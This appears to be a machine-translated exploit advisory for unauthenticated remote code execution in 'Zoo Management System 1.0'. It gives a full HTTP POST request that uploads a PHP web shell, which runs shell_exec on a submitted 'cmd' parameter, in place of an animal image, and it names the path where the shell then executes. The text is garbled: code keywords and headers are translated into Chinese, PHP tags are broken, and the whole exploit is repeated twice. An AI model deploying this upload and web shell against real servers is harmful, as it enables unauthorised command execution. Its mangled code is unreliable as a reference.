#利用title:动物园管理系统1.0-未经身份验证的RCE
#日期: 16.10.2023
#利用作者:çağatayCeyhan
#供应商homepage3360 https://www.sourcecodester.com/php/...-code-php-mysql-database.html#google_vignette
#软件link: https://www.sourcecodester.com/down...+Code+Code+Code+php+php+with+mysql+datatabase
#版本: 1.0
#测试在: Windows 11
##未经验证的用户可以访问/zoomanagementsystem/admin/public_html/save_animal地址,他们可以上传恶意PHP文件而不是动物图片图像,而无需任何身份验证。
post/Zoomanagementsystem/admin/public_html/save_animal http/1.1
HOST: LOCALHOST
内容长度: 6162
cache-control: max-age=0
sec-ch-ua:'铬'; v='117','; a=brand'; v='8'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundary8ny8zt5dxiloiuml
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/117.0.5938.132 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/Zoomanagementsystem/admin/public/public_html/save_animal
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='Animal_id'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_given_name'
KDKD
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_species_name'
ıdsıd
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_dob'
1552-02-05
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_gender'
m
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_avg_lifespan'
3
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='class_id'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data; name='location_id'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_dietary_req'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_natural_habitat'
法德
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_pop_dist'
terter
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_joindate'
5559-02-06
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_height'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_weight'
3
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_description'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='images []';文件名='ultra.php'
content-type:应用程序/钟表流
php
如果(!empty($ _ post ['cmd'])
$ cmd=shell_exec($ _ post ['cmd']);
}
?
!doctype html
html lang='en'
头
meta charset='utf-8'
meta http-equiv='x-ua兼容'content='ie=edge'
meta name='viewport'content='width=设备宽度,初始尺度=1'
titleweb shell/title
风格
* {
-webkit-box-sizing:边框盒;
盒装:边框盒;
}
身体{
font-family: sans-serif;
color: rgba(0,0,0,75);
}
主要的{
Margin: Auto;
Max-Width: 850px;
}
前,
输入,
按钮{
padding: 10px;
Border-Radius: 5px;
背景-Color: #efefefef;
}
标签{
display:块;
}
输入{
width: 100%;
背景-Color: #efefefef;
Border: 2px实心透明;
}
input:focus {
大纲:无;
背景:透明;
Border: 2PX实心#E6E6E6;
}
按钮{
边界:无;
CURSOR:指针;
利润率: 5px;
}
Button:Hover {
Background-Color:#e6e6e6;
}
.form-group {
display: -webkit -box;
display: -ms -flexbox;
display: flex;
padding: 15px 0;
}
/风格
/头
身体
主要的
H1web shell/h1
h2ectecute command/h2
形式方法='post'
标签='cmd'strongcommand/strong/label
div类='form-group'
输入type='text'名称='cmd'id='cmd'value='?=htmlspecialchars($ _ post ['cmd'],ent_quotes,'utf-8')?
onfocus='this.setselectionrange(this.value.length,this.value.length);'需要自动对焦
按钮类型='submit'execute/button
/div
/形式
?
H2Output/H2
?php if(isset($ cmd)):
pre?=htmlspecialchars($ cmd,ent_quotes,'utf-8')?/pre
php else:
PRESMALLNO RESTIR./SMALL/PRE
php endif;
php endif;
/主要的
/身体
/html
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data; name='an_med_record'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_transfer'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_transfer_reason'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_death_date'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_death_cause'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_incineration'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_gest_period'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_category'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_avg_body_temp'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_nest_const'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_clutch_size'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_wingspan'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_color_variant'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_body_temp'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_water_type'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_color_variant'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='rep_type'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='clutch_size'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='num_offspring'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='提交'
------ webkitformboundary8ny8zt5dxiloiuml--
##在攻击者发送的帖子请求后,恶意文件可以在http://localhost/Zoomanagementsyste...system/img/abily/ultra_1697442648.php上执行任意命令。
#日期: 16.10.2023
#利用作者:çağatayCeyhan
#供应商homepage3360 https://www.sourcecodester.com/php/...-code-php-mysql-database.html#google_vignette
#软件link: https://www.sourcecodester.com/down...+Code+Code+Code+php+php+with+mysql+datatabase
#版本: 1.0
#测试在: Windows 11
##未经验证的用户可以访问/zoomanagementsystem/admin/public_html/save_animal地址,他们可以上传恶意PHP文件而不是动物图片图像,而无需任何身份验证。
post/Zoomanagementsystem/admin/public_html/save_animal http/1.1
HOST: LOCALHOST
内容长度: 6162
cache-control: max-age=0
sec-ch-ua:'铬'; v='117','; a=brand'; v='8'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundary8ny8zt5dxiloiuml
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/117.0.5938.132 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/Zoomanagementsystem/admin/public/public_html/save_animal
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='Animal_id'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_given_name'
KDKD
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_species_name'
ıdsıd
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_dob'
1552-02-05
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_gender'
m
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_avg_lifespan'
3
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='class_id'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data; name='location_id'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_dietary_req'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_natural_habitat'
法德
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_pop_dist'
terter
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_joindate'
5559-02-06
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_height'
2
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_weight'
3
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_description'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='images []';文件名='ultra.php'
content-type:应用程序/钟表流
php
如果(!empty($ _ post ['cmd'])
$ cmd=shell_exec($ _ post ['cmd']);
}
?
!doctype html
html lang='en'
头
meta charset='utf-8'
meta http-equiv='x-ua兼容'content='ie=edge'
meta name='viewport'content='width=设备宽度,初始尺度=1'
titleweb shell/title
风格
* {
-webkit-box-sizing:边框盒;
盒装:边框盒;
}
身体{
font-family: sans-serif;
color: rgba(0,0,0,75);
}
主要的{
Margin: Auto;
Max-Width: 850px;
}
前,
输入,
按钮{
padding: 10px;
Border-Radius: 5px;
背景-Color: #efefefef;
}
标签{
display:块;
}
输入{
width: 100%;
背景-Color: #efefefef;
Border: 2px实心透明;
}
input:focus {
大纲:无;
背景:透明;
Border: 2PX实心#E6E6E6;
}
按钮{
边界:无;
CURSOR:指针;
利润率: 5px;
}
Button:Hover {
Background-Color:#e6e6e6;
}
.form-group {
display: -webkit -box;
display: -ms -flexbox;
display: flex;
padding: 15px 0;
}
/风格
/头
身体
主要的
H1web shell/h1
h2ectecute command/h2
形式方法='post'
标签='cmd'strongcommand/strong/label
div类='form-group'
输入type='text'名称='cmd'id='cmd'value='?=htmlspecialchars($ _ post ['cmd'],ent_quotes,'utf-8')?
onfocus='this.setselectionrange(this.value.length,this.value.length);'需要自动对焦
按钮类型='submit'execute/button
/div
/形式
?
H2Output/H2
?php if(isset($ cmd)):
pre?=htmlspecialchars($ cmd,ent_quotes,'utf-8')?/pre
php else:
PRESMALLNO RESTIR./SMALL/PRE
php endif;
php endif;
/主要的
/身体
/html
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data; name='an_med_record'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_transfer'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_transfer_reason'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_death_date'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_death_cause'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='an_incineration'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_gest_period'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_category'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='m_avg_body_temp'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_nest_const'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_clutch_size'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_wingspan'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='b_color_variant'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_body_temp'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_water_type'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='f_color_variant'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='rep_type'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='clutch_size'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='num_offspring'
------ webkitformboundary8ny8zt5dxiloiuml
content-disposition: form-data;名称='提交'
------ webkitformboundary8ny8zt5dxiloiuml--
##在攻击者发送的帖子请求后,恶意文件可以在http://localhost/Zoomanagementsyste...system/img/abily/ultra_1697442648.php上执行任意命令。